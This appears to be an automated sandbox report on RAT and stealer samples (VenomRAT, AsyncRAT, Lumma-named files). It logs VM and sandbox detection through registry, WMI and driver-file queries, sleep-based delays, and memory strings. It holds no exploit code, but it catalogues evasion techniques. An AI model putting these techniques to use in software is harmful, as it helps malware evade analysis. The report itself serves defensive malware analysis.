Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check for Windows Defender sandbox

Source: C:\Users\user\AppData\Local\Temp\2FBE.exe

File Queried: C:\INTERNAL\__empty

Jump to behavior

Yara detected AsyncRAT

Source: Yara match	File source: 18.2.vm.exe.29e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.vm.exe.29e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3248787304.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: Process Memory Space: vm.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vm.exe PID: 5252, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory

Query firmware table information (likely to detect VMs)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\jjistfr	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\jjistfr	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vm.exe, 00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 00000019.00000002.3248787304.0000000004E40000.00000004.08000000.00040000.00000000.sdmp

Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Memory allocated: 1DCCC5B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Memory allocated: 1DCE6070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Memory allocated: 1DCE98C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Memory allocated: 15BDAF30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Memory allocated: 15BF3110000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 170000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 2A20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 27C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 26E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 2960000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 2720000 memory reserve \| memory write watch

Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxSF.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\vmnet.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\vmmouse.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\vboxtray.exe	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\vboxhook.dll	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxGuest.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxVideo.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\vmci.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxMouse.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\vboxservice.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 469	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1468	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 821	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 368	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 361	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2978	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 858	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 884	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Window / User API: threadDelayed 971	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8825
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 634

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Windows\explorer.exe TID: 6336	Thread sleep time: -146800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6308	Thread sleep time: -82100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6120	Thread sleep time: -36100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6100	Thread sleep time: -32900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6588	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6336	Thread sleep time: -297800s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe TID: 5356	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe TID: 3408	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe TID: 5272	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe TID: 6096	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 1420	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1664	Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 3164	Thread sleep time: -65000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe TID: 3548	Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 2076	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\2FBE.exe

Code function: 6_2_00007FF764877000 GetKeyboardLayoutList followed by cmp: cmp r8d, 00000419h and CTI: je 00007FF7648771AFh

6_2_00007FF764877000

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Code function: 18_2_6CA6C1DF GetSystemInfo,VirtualAlloc,

18_2_6CA6C1DF

Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Thread delayed: delay time: 922337203685477

Source: explorer.exe, 00000001.00000000.1714793604.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: wscript.exe, 00000014.00000002.2825370171.00000275A5314000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: explorer.exe, 00000001.00000000.1711065228.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1712692265.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 34CA.exe, 00000008.00000000.2466826859.00007FF65BBF0000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: runtime: sp=abi mismatchout of rangeCypro_MinoanMeetei_MayekPahawh_HmongSora_SompengSyloti_Nagrimultipathtcp127.0.0.1:53no such hostCIDR addressunknown portinvalid portgetaddrinfowtransmitfileGetConsoleCPnot pollableECDSA-SHA256ECDSA-SHA384ECDSA-SHA512SERIALNUMBERstringlengthContent-Typecontext.TODOtlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap traffichttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2100-continueMulti-StatusNot ModifiedUnauthorizedI'm a teapotNot ExtendedproxyconnectMime-VersionX-ImforwardsX-Powered-Bybad Tc valuebad Th valuebad Tq valuebad Pq valuebad Td valuebad Ta valuedisplay-nameban-durationRemoveSignerGetDealLabelChangePeerIDTransferFromgotypesaliasRCodeSuccessRCodeRefusedinvalid baseInstAltMatchunexpected )altmatch -> anynotnl -> empty numberReadObjectCBdecode arraydecode sliceunknown type = struct { Content Type (sensitive)simple errordbl-sha2-256base32hexpadbase58flickrbase64urlpadbase256emojiavx5124fmapsavx512bitalgcaller errorPskModePlaineccsi_sha256PUNSUBSCRIBESUNSUBSCRIBE(database)s$Switch Proxy.fasthttp.gz.fasthttp.brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunctionCalluncompressedparsing time out of rangeDeleteServiceRegEnumKeyExWRegOpenKeyExWStartServiceWCertOpenStoreFindNextFileWFindResourceWGetDriveTypeWMapViewOfFileModule32NextWThread32FirstVirtualUnlockWaitCommEventWriteConsoleWRtlGetVersionRtlInitStringCoTaskMemFreeEnumProcessesShellExecuteWExitWindowsExGetClassNameWtimeEndPeriodFreeAddrInfoWgethostbynamegetservbynameWTSFreeMemoryFindFirstFileWSACloseEventgethostbyaddrgetservbyportWSAResetEventWSAIsBlockingSysFreeStringSafeArrayLockSafeArrayCopyVarI2FromDateVarI2FromDispVarI2FromBoolVarI4FromDateVarI4FromDispVarI4FromBoolVarR4FromDateVarR4FromDispVarR4FromBoolVarR8FromDateVarR8FromDispVarR8FromBoolVarDateFromI2VarDateFromI4VarDateFromR4VarDateFromR8VarDateFromCyVarCyFromDateVarCyFromDispVarCyFromBoolVarBstrFromI2VarBstrFromI4VarBstrFromR4VarBstrFromR8VarBstrFromCyVarBoolFromI2VarBoolFromI4VarBoolFromR4VarBoolFromR8VarBoolFromCyVarUI1FromStrCreateTypeLibClearCustDataLoadTypeLibExVarDecFromUI1VarDecFromStrVarDateFromI1VarBstrFromI1VarBoolFromI1VarUI1FromUI2VarUI1FromUI4VarUI1FromDecVarDecFromUI2VarDecFromUI4VarI1FromDateVarI1FromDispVarI1FromBoolVarUI2FromUI1VarUI2FromStrVarUI2FromUI4VarUI2FromDecVarUI4FromUI1VarUI4FromStrVarUI4FromUI2VarUI4FromDecBSTR_UserSizeBSTR_UserFreeVarI8FromDateVarI8FromDispVarI8FromBoolVarDateFromI8VarBstrFromI8VarBoolFromI8VarUI1FromUI8VarDecFromUI8VarUI2FromUI8VarUI4FromUI8VarUI8FromUI1VarUI8FromStrVarUI8FromUI2VarUI8FromUI4VarUI8FromDecOMAP From SrcInterfaceImplStandAloneSigAssemblyRefOSEFI byte codeMIPS with FPUEFI ROM imageAlign 2-BytesAlign 4-BytesAlign 8-Bytesby_start_timeDRAINING_SUBSDRAINING_PU
Source: lm.exe, 00000013.00000002.3159798781.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2950433978.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`[b%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 00000014.00000002.2825370171.00000275A5314000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: powershell.exe, 0000000E.00000002.2783985099.000002EC464C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
Source: explorer.exe, 00000001.00000000.1714271220.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714271220.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2613300795.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2644907653.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2709132159.0000000002F8B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2709297632.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2705940268.0000000002F8B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2613784729.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2631526881.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2679465444.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.1714793604.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: 34CA.exe, 00000008.00000002.2597221296.000001A41B7A8000.00000004.00000020.00020000.00000000.sdmp, BD9E.exe, 0000000A.00000002.2920422947.000001DCE986B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000001.00000000.1714271220.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1712692265.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1712692265.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000001.00000000.1714793604.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1714793604.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1717391811.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: om&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
Source: explorer.exe, 00000001.00000000.1712692265.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
